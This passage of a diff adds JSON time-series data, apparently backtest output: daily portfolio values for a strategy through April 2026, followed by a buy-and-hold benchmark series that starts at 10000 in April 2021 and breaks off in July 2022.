+ "2025-04-02", + 11097.863513420578 + ], + [ + "2025-04-03", + 10768.638507491016 + ], + [ + "2025-04-04", + 10417.809340791484 + ], + [ + "2025-04-07", + 10463.029684723077 + ], + [ + "2025-04-08", + 10403.005602248048 + ], + [ + "2025-04-09", + 10578.301255695009 + ], + [ + "2025-04-10", + 10565.63568134969 + ], + [ + "2025-04-11", + 10585.69689842619 + ], + [ + "2025-04-14", + 10663.005701703702 + ], + [ + "2025-04-15", + 10688.32548490315 + ], + [ + "2025-04-16", + 10689.579265177199 + ], + [ + "2025-04-17", + 10690.833192524333 + ], + [ + "2025-04-21", + 10689.0972669618 + ], + [ + "2025-04-22", + 10753.682819311427 + ], + [ + "2025-04-23", + 10796.596195300815 + ], + [ + "2025-04-24", + 10797.862676131295 + ], + [ + "2025-04-25", + 10799.12930552468 + ], + [ + "2025-04-28", + 10797.406083498397 + ], + [ + "2025-04-29", + 10837.254784447563 + ], + [ + "2025-04-30", + 10861.245532718352 + ], + [ + "2025-05-01", + 10910.487903530991 + ], + [ + "2025-05-02", + 10911.767744281822 + ], + [ + "2025-05-05", + 10910.057735162725 + ], + [ + "2025-05-06", + 10898.300309745926 + ], + [ + "2025-05-07", + 10937.221769952539 + ], + [ + "2025-05-08", + 11061.730133274576 + ], + [ + "2025-05-09", + 11063.027715300643 + ], + [ + "2025-05-12", + 11064.3254495379 + ], + [ + "2025-05-13", + 11065.623336004204 + ], + [ + "2025-05-14", + 11066.92137471741 + ], + [ + "2025-05-15", + 11068.219565695379 + ], + [ + "2025-05-16", + 11069.51790895597 + ], + [ + "2025-05-19", + 11070.816404517047 + ], + [ + "2025-05-20", + 11072.115052396477 + ], + [ + "2025-05-21", + 11070.423852612124 + ], + [ + "2025-05-22", + 11090.223633808922 + ], + [ + "2025-05-23", + 11073.275063146346 + ], + [ + "2025-05-27", + 11118.795957770662 + ], + [ + "2025-05-28", + 11117.110233829877 + ], + [ + "2025-05-29", + 11129.779332092869 + ], + [ + "2025-05-30", + 11135.183572971031 + ], + [ + "2025-06-02", + 11164.733091206695 + ], + [ + "2025-06-03", + 11166.042755862265 + ], + [ + "2025-06-04", + 11167.352574146362 + ], + [ + "2025-06-05", + 11168.662546077008 + ], + [ + "2025-06-06", + 11169.972671672227 + ], + [ + "2025-06-09", + 11171.282950950044 + ], + [ + "2025-06-10", + 11172.593383928486 + ], + [ + "2025-06-11", + 11173.903970625583 + ], + [ + "2025-06-12", + 11175.214711059367 + ], + [ + "2025-06-13", + 11176.52560524787 + ], + [ + "2025-06-16", + 11177.836653209131 + ], + [ + "2025-06-17", + 11179.147854961187 + ], + [ + "2025-06-18", + 11180.459210522078 + ], + [ + "2025-06-20", + 11181.770719909848 + ], + [ + "2025-06-23", + 11183.082383142539 + ], + [ + "2025-06-24", + 11184.394200238197 + ], + [ + "2025-06-25", + 11185.706171214873 + ], + [ + "2025-06-26", + 11187.018296090619 + ], + [ + "2025-06-27", + 11188.330574883485 + ], + [ + "2025-06-30", + 11189.643007611527 + ], + [ + "2025-07-01", + 11190.955594292802 + ], + [ + "2025-07-02", + 11192.26833494537 + ], + [ + "2025-07-03", + 11193.58122958729 + ], + [ + "2025-07-07", + 11194.894278236627 + ], + [ + "2025-07-08", + 11196.207480911447 + ], + [ + "2025-07-09", + 11197.52083762982 + ], + [ + "2025-07-10", + 11198.834348409811 + ], + [ + "2025-07-11", + 11200.148013269496 + ], + [ + "2025-07-14", + 11201.461832226949 + ], + [ + "2025-07-15", + 11202.775805300244 + ], + [ + "2025-07-16", + 11204.08993250746 + ], + [ + "2025-07-17", + 11205.40421386668 + ], + [ + "2025-07-18", + 11206.718649395982 + ], + [ + "2025-07-21", + 11208.033239113454 + ], + [ + "2025-07-22", + 11209.347983037182 + ], + [ + "2025-07-23", + 11210.662881185255 + ], + [ + "2025-07-24", + 11211.977933575765 + ], + [ + "2025-07-25", + 11213.293140226802 + ], + [ + "2025-07-28", + 11214.608501156465 + ], + [ + "2025-07-29", + 11215.924016382849 + ], + [ + "2025-07-30", + 11217.239685924056 + ], + [ + "2025-07-31", + 11218.555509798187 + ], + [ + "2025-08-01", + 11219.871488023344 + ], + [ + "2025-08-04", + 11221.187620617635 + ], + [ + "2025-08-05", + 11222.503907599166 + ], + [ + "2025-08-06", + 11223.82034898605 + ], + [ + "2025-08-07", + 11225.136944796397 + ], + [ + "2025-08-08", + 11226.453695048322 + ], + [ + "2025-08-11", + 11227.77059975994 + ], + [ + "2025-08-12", + 11229.087658949373 + ], + [ + "2025-08-13", + 11230.404872634741 + ], + [ + "2025-08-14", + 11231.722240834166 + ], + [ + "2025-08-15", + 11233.039763565772 + ], + [ + "2025-08-18", + 11234.357440847689 + ], + [ + "2025-08-19", + 11235.675272698045 + ], + [ + "2025-08-20", + 11236.99325913497 + ], + [ + "2025-08-21", + 11238.311400176599 + ], + [ + "2025-08-22", + 11239.629695841068 + ], + [ + "2025-08-25", + 11240.948146146513 + ], + [ + "2025-08-26", + 11242.266751111076 + ], + [ + "2025-08-27", + 11243.585510752899 + ], + [ + "2025-08-28", + 11244.904425090126 + ], + [ + "2025-08-29", + 11246.223494140902 + ], + [ + "2025-09-02", + 11247.542717923377 + ], + [ + "2025-09-03", + 11248.862096455701 + ], + [ + "2025-09-04", + 11250.181629756027 + ], + [ + "2025-09-05", + 11251.501317842509 + ], + [ + "2025-09-08", + 11252.821160733305 + ], + [ + "2025-09-09", + 11254.141158446573 + ], + [ + "2025-09-10", + 11255.461311000476 + ], + [ + "2025-09-11", + 11256.781618413175 + ], + [ + "2025-09-12", + 11258.102080702838 + ], + [ + "2025-09-15", + 11259.422697887632 + ], + [ + "2025-09-16", + 11260.743469985726 + ], + [ + "2025-09-17", + 11262.064397015292 + ], + [ + "2025-09-18", + 11263.385478994505 + ], + [ + "2025-09-19", + 11264.70671594154 + ], + [ + "2025-09-22", + 11266.028107874576 + ], + [ + "2025-09-23", + 11267.349654811793 + ], + [ + "2025-09-24", + 11268.671356771374 + ], + [ + "2025-09-25", + 11269.993213771504 + ], + [ + "2025-09-26", + 11271.315225830369 + ], + [ + "2025-09-29", + 11272.637392966157 + ], + [ + "2025-09-30", + 11273.959715197061 + ], + [ + "2025-10-01", + 11275.282192541274 + ], + [ + "2025-10-02", + 11276.60482501699 + ], + [ + "2025-10-03", + 11277.927612642408 + ], + [ + "2025-10-06", + 11279.250555435727 + ], + [ + "2025-10-07", + 11280.57365341515 + ], + [ + "2025-10-08", + 11281.896906598879 + ], + [ + "2025-10-09", + 11283.22031500512 + ], + [ + "2025-10-10", + 11284.54387865208 + ], + [ + "2025-10-13", + 11285.867597557975 + ], + [ + "2025-10-14", + 11287.191471741013 + ], + [ + "2025-10-15", + 11285.525501219408 + ], + [ + "2025-10-16", + 11284.578924971596 + ], + [ + "2025-10-17", + 11313.932557164677 + ], + [ + "2025-10-20", + 11340.355892947908 + ], + [ + "2025-10-21", + 11341.686158810355 + ], + [ + "2025-10-22", + 11340.026580717928 + ], + [ + "2025-10-23", + 11368.559587938678 + ], + [ + "2025-10-24", + 11369.893162199292 + ], + [ + "2025-10-27", + 11371.226892893119 + ], + [ + "2025-10-28", + 11372.56078003851 + ], + [ + "2025-10-29", + 11373.894823653816 + ], + [ + "2025-10-30", + 11372.239023757393 + ], + [ + "2025-10-31", + 11403.441628470115 + ], + [ + "2025-11-03", + 11443.2291005043 + ], + [ + "2025-11-04", + 11444.57143377605 + ], + [ + "2025-11-05", + 11445.913924508475 + ], + [ + "2025-11-06", + 11444.26657272005 + ], + [ + "2025-11-07", + 11476.090640363655 + ], + [ + "2025-11-10", + 11535.805298939864 + ], + [ + "2025-11-11", + 11537.158491743501 + ], + [ + "2025-11-12", + 11538.51184328168 + ], + [ + "2025-11-13", + 11536.87535357302 + ], + [ + "2025-11-14", + 11550.697847763697 + ], + [ + "2025-11-17", + 11561.45723944536 + ], + [ + "2025-11-18", + 11514.192169872162 + ], + [ + "2025-11-19", + 11574.785404747747 + ], + [ + "2025-11-20", + 11573.15317006256 + ], + [ + "2025-11-21", + 11606.516035362094 + ], + [ + "2025-11-24", + 11642.757474022641 + ], + [ + "2025-11-25", + 11644.123212713617 + ], + [ + "2025-11-26", + 11645.489111610814 + ], + [ + "2025-11-28", + 11643.865170733025 + ], + [ + "2025-12-01", + 11675.768361383994 + ], + [ + "2025-12-02", + 11709.71155252989 + ], + [ + "2025-12-03", + 11711.085145182933 + ], + [ + "2025-12-04", + 11712.458898963494 + ], + [ + "2025-12-05", + 11710.842813890476 + ], + [ + "2025-12-08", + 11740.305228898826 + ], + [ + "2025-12-09", + 11761.506113563004 + ], + [ + "2025-12-10", + 11762.885781910412 + ], + [ + "2025-12-11", + 11764.265612098041 + ], + [ + "2025-12-12", + 11765.645604144875 + ], + [ + "2025-12-15", + 11767.0257580699 + ], + [ + "2025-12-16", + 11768.406073892107 + ], + [ + "2025-12-17", + 11766.796551630487 + ], + [ + "2025-12-18", + 11800.486058718523 + ], + [ + "2025-12-19", + 11801.870299558263 + ], + [ + "2025-12-22", + 11803.254702774593 + ], + [ + "2025-12-23", + 11804.639268386563 + ], + [ + "2025-12-24", + 11806.023996413222 + ], + [ + "2025-12-26", + 11807.40888687362 + ], + [ + "2025-12-29", + 11808.793939786812 + ], + [ + "2025-12-30", + 11810.179155171854 + ], + [ + "2025-12-31", + 11811.564533047806 + ], + [ + "2026-01-02", + 11812.950073433727 + ], + [ + "2026-01-05", + 11814.335776348682 + ], + [ + "2026-01-06", + 11815.721641811735 + ], + [ + "2026-01-07", + 11817.107669841953 + ], + [ + "2026-01-08", + 11818.493860458408 + ], + [ + "2026-01-09", + 11819.88021368017 + ], + [ + "2026-01-12", + 11821.266729526313 + ], + [ + "2026-01-13", + 11822.653408015914 + ], + [ + "2026-01-14", + 11824.040249168052 + ], + [ + "2026-01-15", + 11825.427253001808 + ], + [ + "2026-01-16", + 11826.814419536264 + ], + [ + "2026-01-20", + 11828.201748790507 + ], + [ + "2026-01-21", + 11829.589240783624 + ], + [ + "2026-01-22", + 11830.976895534704 + ], + [ + "2026-01-23", + 11832.36471306284 + ], + [ + "2026-01-26", + 11833.752693387125 + ], + [ + "2026-01-27", + 11835.140836526658 + ], + [ + "2026-01-28", + 11836.529142500536 + ], + [ + "2026-01-29", + 11837.91761132786 + ], + [ + "2026-01-30", + 11839.306243027735 + ], + [ + "2026-02-02", + 11840.695037619265 + ], + [ + "2026-02-03", + 11842.083995121558 + ], + [ + "2026-02-04", + 11843.473115553727 + ], + [ + "2026-02-05", + 11844.86239893488 + ], + [ + "2026-02-06", + 11843.261845284133 + ], + [ + "2026-02-09", + 11884.367014737698 + ], + [ + "2026-02-10", + 11885.761095125099 + ], + [ + "2026-02-11", + 11887.155339043306 + ], + [ + "2026-02-12", + 11888.549746511502 + ], + [ + "2026-02-13", + 11886.954317548874 + ], + [ + "2026-02-17", + 11923.334234181075 + ], + [ + "2026-02-18", + 11924.732885568033 + ], + [ + "2026-02-19", + 11926.131701021994 + ], + [ + "2026-02-20", + 11927.530680562202 + ], + [ + "2026-02-23", + 11928.929824207906 + ], + [ + "2026-02-24", + 11927.339131978357 + ], + [ + "2026-02-25", + 11961.58497207414 + ], + [ + "2026-02-26", + 11962.988110414712 + ], + [ + "2026-02-27", + 11964.391413348621 + ], + [ + "2026-03-02", + 11965.794880895177 + ], + [ + "2026-03-03", + 11964.208513073687 + ], + [ + "2026-03-04", + 12000.667838302283 + ], + [ + "2026-03-05", + 12002.075561208208 + ], + [ + "2026-03-06", + 12003.48344924526 + ], + [ + "2026-03-09", + 12004.891502432805 + ], + [ + "2026-03-10", + 12006.29972079022 + ], + [ + "2026-03-11", + 12007.70810433688 + ], + [ + "2026-03-12", + 12009.116653092158 + ], + [ + "2026-03-13", + 12010.525367075437 + ], + [ + "2026-03-16", + 12011.934246306098 + ], + [ + "2026-03-17", + 12013.343290803525 + ], + [ + "2026-03-18", + 12014.752500587105 + ], + [ + "2026-03-19", + 12016.161875676225 + ], + [ + "2026-03-20", + 12014.58141609028 + ], + [ + "2026-03-23", + 12050.834707525588 + ], + [ + "2026-03-24", + 12052.248315191586 + ], + [ + "2026-03-25", + 12053.662088679013 + ], + [ + "2026-03-26", + 12055.076028007321 + ], + [ + "2026-03-27", + 12053.500133195963 + ], + [ + "2026-03-30", + 12059.496785369398 + ], + [ + "2026-03-31", + 12099.064688440993 + ], + [ + "2026-04-01", + 12100.48395366287 + ], + [ + "2026-04-02", + 12101.90338536983 + ], + [ + "2026-04-06", + 12100.332983581398 + ], + [ + "2026-04-07", + 12117.723691047368 + ], + [ + "2026-04-08", + 12165.720729390196 + ], + [ + "2026-04-09", + 12167.147813613226 + ], + [ + "2026-04-10", + 12168.575065238536 + ], + [ + "2026-04-13", + 12167.012484285762 + ], + [ + "2026-04-14", + 12227.58726732879 + ], + [ + "2026-04-15", + 12229.021608726483 + ], + [ + "2026-04-16", + 12230.45611837775 + ], + [ + "2026-04-17", + 12231.890796302325 + ], + [ + "2026-04-20", + 12233.325642519949 + ], + [ + "2026-04-21", + 12234.760657050363 + ], + [ + "2026-04-22", + 12236.195839913311 + ], + [ + "2026-04-23", + 12237.63119112854 + ] + ], + "benchmark_bh": [ + [ + "2021-04-01", + 10000.0 + ], + [ + "2021-04-05", + 10199.647941704976 + ], + [ + "2021-04-06", + 10192.56336923354 + ], + [ + "2021-04-07", + 10217.212100589302 + ], + [ + "2021-04-08", + 10323.813988116288 + ], + [ + "2021-04-09", + 10386.358206138193 + ], + [ + "2021-04-12", + 10372.803341685869 + ], + [ + "2021-04-13", + 10493.884421091021 + ], + [ + "2021-04-14", + 10367.873595414716 + ], + [ + "2021-04-15", + 10525.001506634326 + ], + [ + "2021-04-16", + 10537.327810105553 + ], + [ + "2021-04-19", + 10440.891586469474 + ], + [ + "2021-04-20", + 10364.7905662019 + ], + [ + "2021-04-21", + 10453.525030185976 + ], + [ + "2021-04-22", + 10327.512266716325 + ], + [ + "2021-04-23", + 10457.529480134615 + ], + [ + "2021-04-26", + 10525.618693814893 + ], + [ + "2021-04-27", + 10480.021447496749 + ], + [ + "2021-04-28", + 10444.58986506951 + ], + [ + "2021-04-29", + 10482.178211490378 + ], + [ + "2021-04-30", + 10413.469872836187 + ], + [ + "2021-05-03", + 10358.01410287241 + ], + [ + "2021-05-04", + 10171.614854271158 + ], + [ + "2021-05-05", + 10137.41280172169 + ], + [ + "2021-05-06", + 10213.821931131211 + ], + [ + "2021-05-07", + 10296.70135252162 + ], + [ + "2021-05-10", + 10036.664018995025 + ], + [ + "2021-05-11", + 10022.800076504082 + ], + [ + "2021-05-12", + 9763.38283684807 + ], + [ + "2021-05-13", + 9838.862794348386 + ], + [ + "2021-05-14", + 10056.074894937688 + ], + [ + "2021-05-17", + 9995.072191522193 + ], + [ + "2021-05-18", + 9927.598227229135 + ], + [ + "2021-05-19", + 9938.994389894486 + ], + [ + "2021-05-20", + 10131.249649986077 + ], + [ + "2021-05-21", + 10075.17572394506 + ], + [ + "2021-05-24", + 10244.634783119262 + ], + [ + "2021-05-25", + 10258.804896958807 + ], + [ + "2021-05-26", + 10294.544588527991 + ], + [ + "2021-05-27", + 10256.032883577956 + ], + [ + "2021-05-28", + 10288.382405689052 + ], + [ + "2021-06-01", + 10254.18229093293 + ], + [ + "2021-06-02", + 10274.209385159487 + ], + [ + "2021-06-03", + 10167.300357387227 + ], + [ + "2021-06-04", + 10339.834694600862 + ], + [ + "2021-06-07", + 10370.645608795567 + ], + [ + "2021-06-08", + 10375.574386170047 + ], + [ + "2021-06-09", + 10378.03829040895 + ], + [ + "2021-06-10", + 10486.18363033569 + ], + [ + "2021-06-11", + 10513.604375072304 + ], + [ + "2021-06-14", + 10614.351220005623 + ], + [ + "2021-06-15", + 10545.031507550902 + ], + [ + "2021-06-16", + 10506.517864807522 + ], + [ + "2021-06-17", + 10639.925247683901 + ], + [ + "2021-06-18", + 10556.429608009597 + ], + [ + "2021-06-21", + 10622.038446207534 + ], + [ + "2021-06-22", + 10721.052903889908 + ], + [ + "2021-06-23", + 10726.296572683044 + ], + [ + "2021-06-24", + 10792.614643245463 + ], + [ + "2021-06-25", + 10779.350447794975 + ], + [ + "2021-06-28", + 10910.445074313406 + ], + [ + "2021-06-29", + 10949.929551522922 + ], + [ + "2021-06-30", + 10932.654123847085 + ], + [ + "2021-07-01", + 10936.972496317709 + ], + [ + "2021-07-02", + 11062.517282694402 + ], + [ + "2021-07-06", + 11110.324582323177 + ], + [ + "2021-07-07", + 11133.769944011337 + ], + [ + "2021-07-08", + 11066.525608229731 + ], + [ + "2021-07-09", + 11135.620536656364 + ], + [ + "2021-07-12", + 11179.112370504537 + ], + [ + "2021-07-13", + 11179.112370504537 + ], + [ + "2021-07-14", + 11199.162718251242 + ], + [ + "2021-07-15", + 11120.504779664176 + ], + [ + "2021-07-16", + 11030.43614496167 + ], + [ + "2021-07-19", + 10940.058432220543 + ], + [ + "2021-07-20", + 11067.142795410298 + ], + [ + "2021-07-21", + 11152.585917396907 + ], + [ + "2021-07-22", + 11226.305389642766 + ], + [ + "2021-07-23", + 11357.40098505787 + ], + [ + "2021-07-26", + 11366.345839141062 + ], + [ + "2021-07-27", + 11241.110130802988 + ], + [ + "2021-07-28", + 11284.294824405888 + ], + [ + "2021-07-29", + 11304.346141049265 + ], + [ + "2021-07-30", + 11245.430441066957 + ], + [ + "2021-08-02", + 11246.35864407949 + ], + [ + "2021-08-03", + 11314.524400596918 + ], + [ + "2021-08-04", + 11330.873563053567 + ], + [ + "2021-08-05", + 11402.744380447743 + ], + [ + "2021-08-06", + 11352.770627858608 + ], + [ + "2021-08-09", + 11373.749178617845 + ], + [ + "2021-08-10", + 11315.451634712777 + ], + [ + "2021-08-11", + 11296.01847414664 + ], + [ + "2021-08-12", + 11336.73441902727 + ], + [ + "2021-08-13", + 11376.524098688715 + ], + [ + "2021-08-16", + 11381.46159613325 + ], + [ + "2021-08-17", + 11281.213732986416 + ], + [ + "2021-08-18", + 11172.637234040285 + ], + [ + "2021-08-19", + 11226.615436578059 + ], + [ + "2021-08-20", + 11342.902415246248 + ], + [ + "2021-08-23", + 11512.55622265168 + ], + [ + "2021-08-24", + 11547.718451803883 + ], + [ + "2021-08-25", + 11560.984585047716 + ], + [ + "2021-08-26", + 11487.57128415046 + ], + [ + "2021-08-27", + 11599.230812309406 + ], + [ + "2021-08-30", + 11729.39917360865 + ], + [ + "2021-08-31", + 11719.838101241563 + ], + [ + "2021-09-01", + 11739.272230704375 + ], + [ + "2021-09-02", + 11733.717546079273 + ], + [ + "2021-09-03", + 11769.810884934024 + ], + [ + "2021-09-07", + 11786.46428094593 + ], + [ + "2021-09-08", + 11745.438289130007 + ], + [ + "2021-09-09", + 11705.032391184668 + ], + [ + "2021-09-10", + 11616.19619304995 + ], + [ + "2021-09-13", + 11608.174697495926 + ], + [ + "2021-09-14", + 11575.173107924044 + ], + [ + "2021-09-15", + 11661.232448194549 + ], + [ + "2021-09-16", + 11669.249099265207 + ], + [ + "2021-09-17", + 11531.06214910196 + ], + [ + "2021-09-20", + 11292.79204822625 + ], + [ + "2021-09-21", + 11306.68893320407 + ], + [ + "2021-09-22", + 11412.298670538119 + ], + [ + "2021-09-23", + 11517.597392040203 + ], + [ + "2021-09-24", + 11528.406403321844 + ], + [ + "2021-09-27", + 11436.384472926993 + ], + [ + "2021-09-28", + 11112.762326351916 + ], + [ + "2021-09-29", + 11094.543193316784 + ], + [ + "2021-09-30", + 11053.782679189204 + ], + [ + "2021-10-01", + 11122.335994375748 + ], + [ + "2021-10-04", + 10888.882278860478 + ], + [ + "2021-10-05", + 11035.874561986036 + ], + [ + "2021-10-06", + 11106.586578959555 + ], + [ + "2021-10-07", + 11208.491255416859 + ], + [ + "2021-10-08", + 11152.598513053654 + ], + [ + "2021-10-11", + 11067.061408089783 + ], + [ + "2021-10-12", + 11028.46347133587 + ], + [ + "2021-10-13", + 11116.77549637061 + ], + [ + "2021-10-14", + 11321.511114504403 + ], + [ + "2021-10-15", + 11392.843225348508 + ], + [ + "2021-10-18", + 11507.406536835804 + ], + [ + "2021-10-19", + 11594.488063096102 + ], + [ + "2021-10-20", + 11579.358741550494 + ], + [ + "2021-10-21", + 11650.07269631736 + ], + [ + "2021-10-22", + 11552.181189878751 + ], + [ + "2021-10-25", + 11670.454406726158 + ], + [ + "2021-10-26", + 11707.199813041698 + ], + [ + "2021-10-27", + 11734.374458023423 + ], + [ + "2021-10-28", + 11864.688153823587 + ], + [ + "2021-10-29", + 11923.050613805732 + ], + [ + "2021-11-01", + 11963.812096829983 + ], + [ + "2021-11-02", + 12013.838169839448 + ], + [ + "2021-11-03", + 12141.374038878723 + ], + [ + "2021-11-04", + 12297.008880325564 + ], + [ + "2021-11-05", + 12308.741250136372 + ], + [ + "2021-11-08", + 12292.06460060432 + ], + [ + "2021-11-09", + 12207.455698652982 + ], + [ + "2021-11-10", + 12028.044132855886 + ], + [ + "2021-11-11", + 12061.395494126646 + ], + [ + "2021-11-12", + 12188.312238192007 + ], + [ + "2021-11-15", + 12185.532473637775 + ], + [ + "2021-11-16", + 12272.305890756124 + ], + [ + "2021-11-17", + 12278.787809497086 + ], + [ + "2021-11-18", + 12406.015569394414 + ], + [ + "2021-11-19", + 12475.18413396818 + ], + [ + "2021-11-22", + 12330.35927269965 + ], + [ + "2021-11-23", + 12274.15551450448 + ], + [ + "2021-11-24", + 12313.685529857617 + ], + [ + "2021-11-26", + 12080.231814342345 + ], + [ + "2021-11-29", + 12342.40168944575 + ], + [ + "2021-11-30", + 12161.135655416936 + ], + [ + "2021-12-01", + 11954.240366599497 + ], + [ + "2021-12-02", + 12040.395627640606 + ], + [ + "2021-12-03", + 11831.033527894244 + ], + [ + "2021-12-06", + 11925.830378359964 + ], + [ + "2021-12-07", + 12284.966463579465 + ], + [ + "2021-12-08", + 12339.929065136792 + ], + [ + "2021-12-09", + 12158.355890862704 + ], + [ + "2021-12-10", + 12290.52211710124 + ], + [ + "2021-12-13", + 12112.963081742519 + ], + [ + "2021-12-14", + 11987.592696766927 + ], + [ + "2021-12-15", + 12260.876785603901 + ], + [ + "2021-12-16", + 11945.59296379485 + ], + [ + "2021-12-17", + 11885.994191658227 + ], + [ + "2021-12-20", + 11770.699363182974 + ], + [ + "2021-12-21", + 12034.127835064332 + ], + [ + "2021-12-22", + 12180.689928067173 + ], + [ + "2021-12-23", + 12272.520016920811 + ], + [ + "2021-12-27", + 12475.351753092573 + ], + [ + "2021-12-28", + 12417.53187524719 + ], + [ + "2021-12-29", + 12415.676438118799 + ], + [ + "2021-12-30", + 12378.574477827671 + ], + [ + "2021-12-31", + 12301.274932375856 + ], + [ + "2022-01-03", + 12419.693483724182 + ], + [ + "2022-01-04", + 12258.605691802883 + ], + [ + "2022-01-05", + 11882.007181849698 + ], + [ + "2022-01-06", + 11873.65819922027 + ], + [ + "2022-01-07", + 11745.035228114126 + ], + [ + "2022-01-10", + 11752.766054666314 + ], + [ + "2022-01-11", + 11929.313561898642 + ], + [ + "2022-01-12", + 11976.619941947587 + ], + [ + "2022-01-13", + 11677.010930510924 + ], + [ + "2022-01-14", + 11749.674305383442 + ], + [ + "2022-01-18", + 11457.175057731709 + ], + [ + "2022-01-19", + 11331.334757869814 + ], + [ + "2022-01-20", + 11184.155477686407 + ], + [ + "2022-01-21", + 10874.035875143323 + ], + [ + "2022-01-24", + 10923.819723984592 + ], + [ + "2022-01-25", + 10670.58501399765 + ], + [ + "2022-01-26", + 10653.89189322216 + ], + [ + "2022-01-27", + 10546.598213470803 + ], + [ + "2022-01-28", + 10877.436702464815 + ], + [ + "2022-01-31", + 11225.280296962954 + ], + [ + "2022-02-01", + 11301.650670505565 + ], + [ + "2022-02-02", + 11393.47979046253 + ], + [ + "2022-02-03", + 10931.546674950087 + ], + [ + "2022-02-04", + 11069.446831698191 + ], + [ + "2022-02-07", + 10980.400382985477 + ], + [ + "2022-02-08", + 11103.767089641738 + ], + [ + "2022-02-09", + 11339.062677731983 + ], + [ + "2022-02-10", + 11082.432953803587 + ], + [ + "2022-02-11", + 10730.878485048665 + ], + [ + "2022-02-14", + 10744.173685192682 + ], + [ + "2022-02-15", + 11011.31884471086 + ], + [ + "2022-02-16", + 11008.534235673264 + ], + [ + "2022-02-17", + 10681.101418484106 + ], + [ + "2022-02-18", + 10559.276226434253 + ], + [ + "2022-02-22", + 10453.222734424065 + ], + [ + "2022-02-23", + 10185.461356621992 + ], + [ + "2022-02-24", + 10527.73960863163 + ], + [ + "2022-02-25", + 10690.992884616615 + ], + [ + "2022-02-28", + 10722.83954935453 + ], + [ + "2022-03-01", + 10558.65710146034 + ], + [ + "2022-03-02", + 10735.827609253272 + ], + [ + "2022-03-03", + 10582.467737194142 + ], + [ + "2022-03-04", + 10429.107865135009 + ], + [ + "2022-03-07", + 10044.466543900999 + ], + [ + "2022-03-08", + 9997.781226619312 + ], + [ + "2022-03-09", + 10357.680802416971 + ], + [ + "2022-03-10", + 10242.660171700118 + ], + [ + "2022-03-11", + 10030.244109641122 + ], + [ + "2022-03-14", + 9837.62066881387 + ], + [ + "2022-03-15", + 10146.192943370508 + ], + [ + "2022-03-16", + 10522.486250871765 + ], + [ + "2022-03-17", + 10649.870003133412 + ], + [ + "2022-03-18", + 10867.850438784237 + ], + [ + "2022-03-21", + 10837.63636493997 + ], + [ + "2022-03-22", + 11050.627951622602 + ], + [ + "2022-03-23", + 10891.81125350232 + ], + [ + "2022-03-24", + 11133.89977616549 + ], + [ + "2022-03-25", + 11124.612901556804 + ], + [ + "2022-03-28", + 11296.737395477849 + ], + [ + "2022-03-29", + 11491.152326253088 + ], + [ + "2022-03-30", + 11364.226862117672 + ], + [ + "2022-03-31", + 11223.367694930868 + ], + [ + "2022-04-01", + 11202.01030557257 + ], + [ + "2022-04-04", + 11432.64259397668 + ], + [ + "2022-04-05", + 11178.789727912499 + ], + [ + "2022-04-06", + 10936.081111378742 + ], + [ + "2022-04-07", + 10962.087266973083 + ], + [ + "2022-04-08", + 10808.846569204705 + ], + [ + "2022-04-11", + 10553.138266012133 + ], + [ + "2022-04-12", + 10508.557392303745 + ], + [ + "2022-04-13", + 10722.16519727027 + ], + [ + "2022-04-14", + 10476.982018634208 + ], + [ + "2022-04-18", + 10485.030643295071 + ], + [ + "2022-04-19", + 10719.379619336 + ], + [ + "2022-04-20", + 10563.044265594732 + ], + [ + "2022-04-21", + 10344.484429733579 + ], + [ + "2022-04-22", + 10073.604173541797 + ], + [ + "2022-04-25", + 10203.00807536621 + ], + [ + "2022-04-26", + 9817.89490145255 + ], + [ + "2022-04-27", + 9806.131526948213 + ], + [ + "2022-04-28", + 10154.402404879054 + ], + [ + "2022-04-29", + 9697.468796198205 + ], + [ + "2022-05-02", + 9859.376274704686 + ], + [ + "2022-05-03", + 9869.903337054542 + ], + [ + "2022-05-04", + 10203.625262546775 + ], + [ + "2022-05-05", + 9689.729249575963 + ], + [ + "2022-05-06", + 9573.63895693235 + ], + [ + "2022-05-09", + 9199.051876471874 + ], + [ + "2022-05-10", + 9310.807325401429 + ], + [ + "2022-05-11", + 9034.667898069745 + ], + [ + "2022-05-12", + 9013.305664228083 + ], + [ + "2022-05-13", + 9347.339574448955 + ], + [ + "2022-05-16", + 9238.985921737565 + ], + [ + "2022-05-17", + 9478.287897569793 + ], + [ + "2022-05-18", + 9012.996586189463 + ], + [ + "2022-05-19", + 8964.702900430946 + ], + [ + "2022-05-20", + 8936.839369914867 + ], + [ + "2022-05-23", + 9085.437114827238 + ], + [ + "2022-05-24", + 8892.261402896498 + ], + [ + "2022-05-25", + 9016.712304929611 + ], + [ + "2022-05-26", + 9266.539405318352 + ], + [ + "2022-05-27", + 9568.994066282996 + ], + [ + "2022-05-31", + 9543.608973455914 + ], + [ + "2022-06-01", + 9473.026788636547 + ], + [ + "2022-06-02", + 9732.450810569268 + ], + [ + "2022-06-03", + 9479.219007272344 + ], + [ + "2022-06-06", + 9510.793412045206 + ], + [ + "2022-06-07", + 9592.83376891698 + ], + [ + "2022-06-08", + 9523.796005394042 + ], + [ + "2022-06-09", + 9268.706827175381 + ], + [ + "2022-06-10", + 8941.79333860284 + ], + [ + "2022-06-13", + 8526.032994032177 + ], + [ + "2022-06-14", + 8541.511118379989 + ], + [ + "2022-06-15", + 8754.809845307895 + ], + [ + "2022-06-16", + 8401.584998689083 + ], + [ + "2022-06-17", + 8503.743526074657 + ], + [ + "2022-06-21", + 8718.289223020442 + ], + [ + "2022-06-22", + 8705.575360880099 + ], + [ + "2022-06-23", + 8835.222455769383 + ], + [ + "2022-06-24", + 9137.950345595755 + ], + [ + "2022-06-27", + 9070.952109569036 + ], + [ + "2022-06-28", + 8794.591773795957 + ], + [ + "2022-06-29", + 8802.656869700257 + ], + [ + "2022-06-30", + 8693.475779230304 + ], + [ + "2022-07-01", + 8750.856746882913 + ], + [ + "2022-07-05", + 8900.668519326291 + ], + [ + "2022-07-06", + 8957.741377836954 + ], + [ + "2022-07-07", + 9149.427895581617 + ], + [ + "2022-07-08", + 9160.903507774136 + ], + [ + "2022-07-11", + 8965.185410973994 + ], + [ + "2022-07-12", + 8878.336419915167 + ], + [ + "2022-07-13", + 8860.036868456193 + ], + [ + "2022-07-14", + 8891.67522040946 + ], + [ + "2022-07-15", + 9052.963573942028 + ], + [ + "2022-07-18", + 8976.351945127893 + ], + [ + "2022-07-19", + 9252.406109552372 + ], + [ + "2022-07-20", + 9399.114505952804 + ], + [ + "2022-07-21", + 9534.041118812118 + ], + [ + "2022-07-22", + 9366.857997922298 + ], + [ + "2022-07-25", + 9313.506671531819 + ], + [ + "2022-07-26", + 9130.504374665366 + ], + [ + "2022-07-27", + 9516.359723430383 + ], + [ + "2022-07-28", + 